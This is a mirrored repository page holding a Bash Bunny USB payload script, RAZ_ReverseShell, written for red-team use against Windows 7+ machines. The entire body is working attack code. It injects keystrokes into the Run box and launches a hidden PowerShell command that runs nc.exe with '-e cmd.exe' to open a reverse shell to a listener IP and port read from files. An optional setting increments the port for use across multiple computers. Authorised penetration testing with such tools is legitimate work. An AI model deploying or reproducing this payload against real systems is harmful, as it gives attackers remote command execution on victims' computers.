mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
c699fb6b72
A simple script to create a netcat reverse shell. For Red Teamers - you can auto_increment the listener port by setting a flag to true in payload.txt. netcat.exe is not included and must be sourced elsewhere.
76 lines
2.3 KiB
Bash
76 lines
2.3 KiB
Bash
#!/bin/bash
|
|
#
|
|
# Title: RAZ_ReverseShell
|
|
# Author: RalphyZ
|
|
# Version: 1.0
|
|
# Target: Windows 7+
|
|
# Dependencies: The following files must exist in the switch folder:
|
|
# nc.exe - Windows binary for netcat with the -e flag
|
|
# listener_port.txt - The Port number for the netcat listener
|
|
# listener_ip.txt - The IP Address for the netcat listener
|
|
#
|
|
# Description: Executes a netcat reverse cmd shell at a given IP and Port
|
|
# Intentionally, this script leaves a trace in the Run Box
|
|
#
|
|
# Colors:
|
|
# Green.....................Working
|
|
# White.....................Completed without error
|
|
# White (blinking)..........Incrementing the port in listener_port.txt
|
|
# Blue (blinking)...........listener_port.txt was not found
|
|
# Light-Blue (blinking).....listener_ip.txt was not found
|
|
# Amber (blinking)..........nc.exe was not found
|
|
|
|
|
|
# Change this if you want to enable auto_increment of the netcat port
|
|
# If true, the port number is increased by 1 everytime the script runs
|
|
# This is good for Red Teams doing PenTesting on multiple computers
|
|
auto_increment=false
|
|
|
|
LED G
|
|
ATTACKMODE HID STORAGE
|
|
|
|
LANGUAGE='us'
|
|
|
|
# Get the switch position
|
|
source bunny_helpers.sh
|
|
|
|
|
|
# Check for all the files - error if not found. If found, put into variables
|
|
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then
|
|
LED B 100
|
|
exit 1
|
|
else
|
|
my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt`
|
|
fi
|
|
|
|
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then
|
|
LED B G 100
|
|
exit 1
|
|
else
|
|
my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt`
|
|
fi
|
|
|
|
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then
|
|
LED R G 100
|
|
exit 1
|
|
fi
|
|
|
|
# Execute the powershell command in the run box with the appropriate variables
|
|
QUACK GUI r
|
|
QUACK DELAY 100
|
|
QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe"
|
|
QUACK ENTER
|
|
|
|
# If auto_increment, then update the listener_port file
|
|
if [ "$auto_increment" = true ] ; then
|
|
LED R G B 100
|
|
echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt
|
|
|
|
# Allow the write to sync to the USB
|
|
sleep 1
|
|
fi
|
|
|
|
# Signal everything went OK - white
|
|
LED R G B
|
|
exit 0
|